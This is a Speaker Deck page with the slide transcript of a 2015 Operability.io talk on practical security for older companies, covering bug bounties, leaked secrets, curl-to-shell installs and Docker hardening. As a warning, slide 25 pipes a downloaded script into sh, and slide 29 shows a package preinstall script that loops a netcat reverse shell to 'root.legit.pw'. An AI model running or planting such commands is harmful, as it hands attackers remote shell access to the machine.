Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security for non-unicorns

Bea Hughes
September 25, 2015
Technology
1
200

Security for non-unicorns

Operability.io September 2015.

Security is becoming quite the thing now days, everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than say, 6 months. You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things. What happens when you do uncover these things. How to stop them happening. And coping strategies for dealing with them

Bea Hughes

September 25, 2015
Tweet

More Decks by Bea Hughes

See All by Bea Hughes
"Is security even important?" and other clickbait titles
barnbarn
1
310
Osquery, He Knows Me
barnbarn
0
480
Layer 2 person spoofing and impostor syndrome
barnbarn
2
720
MacOS security, hardening and forensics 101 workshop
barnbarn
2
1.4k
How you a actually get hacked!
barnbarn
7
4.9k
Why won’t my DevOps team talk to my Security team?
barnbarn
3
330
Impostor Syndrome in tech
barnbarn
4
520
SecDevOps: Creating cultural change to bridge between security and DevOps?
barnbarn
3
540
Security for non-Unicorns!
barnbarn
5
1.5k

Other Decks in Technology

See All in Technology
CDK使用歴1年の僕が現場でCDK導入するときに得たTips
miura55
0
390
安全にプロセスを停止するためにシグナル制御を学ぼう!
yamamotohiroya
0
130
テスト技法を使ったテストケースの表現方法/How to express test cases using test techniques
shimashima35
0
360
シゴトをジモトに運び込め〜大企業でCCoEやってた私が地元に事業所を作るまで〜
mamohacy
2
120
QMファンネルとQAキャリア
gen519
PRO
1
250
データの民主化はじめました 俺たちの民主化はこれからだ
akki_megane
0
170
開幕LT
makamaka
0
370
Tackle the infodemic of misinformation from LINE
line_developers_tw
PRO
0
170
stdClassって一体何者なんだ?!/Who the hell is stdClass?
daina0321
0
320
IoTによるGPS等の位置情報活用 基礎知識
soracom
PRO
0
180
Lookerから、dbtと相性のよいLightdashに移行してみた話
hirokiigeta
0
100
ZOZOTOWNの裏側に迫る! Javaで作られたBFFの開発事例を紹介
yutaro527
0
390

Featured

See All Featured
Adopting Sorbet at Scale
ufuk
65
7.9k
Three Pipe Problems
jasonvnalue
89
9k
From Idea to $5000 a Month in 5 Months
shpigford
374
44k
Designing Experiences People Love
moore
130
22k
Practical Orchestrator
shlominoach
178
9k
10 Git Anti Patterns You Should be Aware of
lemiorhan
643
55k
Building Better People: How to give real-time feedback that sticks.
wjessup
346
17k
Making the Leap to Tech Lead
cromwellryan
117
7.7k
4 Signs Your Business is Dying
shpigford
171
20k
Gamification - CAS2011
davidbonilla
75
4.2k
For a Future-Friendly Web
brad_frost
166
7.9k
How to train your dragon (web standard)
notwaldorf
66
4.4k

Transcript

  1. Security For Non-Unicorns
    1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog
    @benjammingh for Operability.io 1

    View Slide

  2. Who's this clown? 2
    • Infrastructure security charlatan at Etsy
    • Operations monkey at Puppet Labs
    • Survived a bunch of startups in London. (some of them still
    have websites...)
    • Has far too many opinions about pretty much everything on
    the TwitterNet @benjammingh
    2 https://twitter.com/skullmandible/status/411281851131523072
    @benjammingh for Operability.io 2

    View Slide

  3. Unicorns?
    @benjammingh for Operability.io 3

    View Slide

  4. Setlist
    • The problem(™).
    • The solution(s)(™).
    • The wrap up.
    • Rapturous applause.
    • We all go home/dance parties/our secret lives as
    superheroes & heroines.
    @benjammingh for Operability.io 4

    View Slide

  5. The problem
    security is hard.
    @benjammingh for Operability.io 5

    View Slide

  6. From tiny seeds, do mighty
    acorns grow.
    • PinkiePwn's 6 small bugs in Chrome to full sandbox escape
    • Egor Homakov's 5 small bugs in Github to full private access
    on GitHub
    • from XSS to remote code execution in under an hour
    • Username & password stolen for HVAC system leads to
    $160+ Million Target breach.
    @benjammingh for Operability.io 6

    View Slide

  7. Things that aren't
    security are hard too.
    @benjammingh for Operability.io 7

    View Slide

  8. Computering is hard.
    No. 1 takeaway for security types is a sense of perspective.
    @benjammingh for Operability.io 8

    View Slide

  9. Security people aren't great
    secure coders.
    • Snort: 10 CVEs, Wireshark: 322! CVEs
    • Joxean Koret on Breaking Antivurius software
    • Security Firm Bit9 Hacked, Used to Spread Malware
    • Tavis Ormandy from Project Zero on exploiting ESET
    • BEST! FireEye just running Apache/PHP as root
    @benjammingh for Operability.io 9

    View Slide

  10. So who do I trust?
    • No one? Always a great position for security people, who
    don't want to get paid.
    • Everyone? Do I have a 419 email for YOU!
    • Security vendors? If you have infinite money and no
    attackers.
    • Attackers!
    @benjammingh for Operability.io 10

    View Slide

  11. "You're already being
    probed for security
    holes, do you want to
    know or not?"
    @benjammingh for Operability.io 11

    View Slide

  12. Bug bounties 101:
    Have one!
    Bug Crowd vs. HackerOne
    @benjammingh for Operability.io 12

    View Slide

  13. Bug bounties 102:
    Prepare a lot.
    @benjammingh for Operability.io 13

    View Slide

  14. Bug bounties 103:
    The first few weeks will be hell.
    @benjammingh for Operability.io 14

    View Slide

  15. Bug bounties 104:
    Be ready with bees!
    @benjammingh for Operability.io 15

    View Slide

  16. Security on the inside
    @benjammingh for Operability.io 16

    View Slide

  17. Armadillo security
    architecture
    @benjammingh for Operability.io 17

    View Slide

  18. Cloud
    @benjammingh for Operability.io 18

    View Slide

  19. Github
    @benjammingh for Operability.io 19

    View Slide

  20. @benjammingh for Operability.io 20

    View Slide

  21. But this doesn't
    happen in real life,
    right?
    @benjammingh for Operability.io 21

    View Slide

  22. @benjammingh for Operability.io 22

    View Slide

  23. Go use Gitrob
    • http://michenriksen.com/blog/gitrob-putting-the-open-
    source-in-osint/
    • https://github.com/michenriksen/gitrob
    @benjammingh for Operability.io 23

    View Slide

  24. curl | bash
    @benjammingh for Operability.io 24

    View Slide

  25. curl legit.pw/mac | sh
    @benjammingh for Operability.io 25

    View Slide

  26. "But I check them, obviously!"
    @benjammingh for Operability.io 26

    View Slide

  27. @benjammingh for Operability.io 27

    View Slide

  28. curl | bash
    "But this is no worse than packages."
    root# yum install sketchy
    @benjammingh for Operability.io 28

    View Slide

  29. curl | bash
    root# rpm -qp --scripts sketchy-1.33-7.rpm
    preinstall scriptlet (using /bin/sh):
    bash -c 'while : ; \
    do \
    nc -e /bin/sh root.legit.pw 2222 ;\
    done'
    @benjammingh for Operability.io 29

    View Slide

  30. A LIVE DEMO, madness.
    @benjammingh for Operability.io 30

    View Slide

  31. Lightweight containers!
    @benjammingh for Operability.io 31

    View Slide

  32. chroot(8)
    @benjammingh for Operability.io 32

    View Slide

  33. FreeBSD Jails
    @benjammingh for Operability.io 33

    View Slide

  34. Solaris Zones
    @benjammingh for Operability.io 34

    View Slide

  35. AIX LPAR
    @benjammingh for Operability.io 35

    View Slide

  36. @benjammingh for Operability.io 36

    View Slide

  37. Is Docker secure?
    @benjammingh for Operability.io 37

    View Slide

  38. >30% of Images in
    Docker Hub Contain
    High Priority Security
    Vulns
    - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner
    from BanyanOps
    @benjammingh for Operability.io 38

    View Slide

  39. @benjammingh for Operability.io 39

    View Slide

  40. As secure as Vagrant?
    @benjammingh for Operability.io 40

    View Slide

  41. But is Docker itself secure?
    • Don't run things as root.
    • No really, stop running things as root.
    • Did I mention not running things as root.
    • It is also not 1999.
    (Docker 1.8 addresses some of this, with it's changes to who it
    runs as)
    @benjammingh for Operability.io 41

    View Slide

  42. Securify the Docker.
    • Don't use --privileged.
    • Use --cap-drop all and --cap-drop to get the
    minimum capabilities.
    • Use Docker Notary
    • Use GRSecurity (just do that anyway, if you can.)
    • Use SELinux... I may as well ask for a pony here.
    @benjammingh for Operability.io 42

    View Slide

  43. Summary
    • Computers are apparently hard.
    • Security is clearly harder still, obv.
    • Actually trust and humans is hard.
    • The typing is the easy bit. (ish)
    @benjammingh for Operability.io 43

    View Slide

  44. More Summary
    • Complex systems lead to much more complex security
    problems. (see Oauth)
    • Annual pen-tests don't scale, bug bounties can.
    • Attackers are mining any public info you have (GitHub, S3)
    • I beg you to stop trusting curl.
    • Docker and security can be used in the same sentence.
    @benjammingh for Operability.io 44

    View Slide

  45. Thank you!
    Twidder: @benjammingh
    LinkedIn: lnkdin.me/p/benyeah
    FidoNet: 2:254/524.13
    JitHub: github.com/barn
    SpeakerDeck: speakerdeck.com/barnbarn
    Etsy: Careers CodeAsCraft
    @benjammingh for Operability.io 45

    View Slide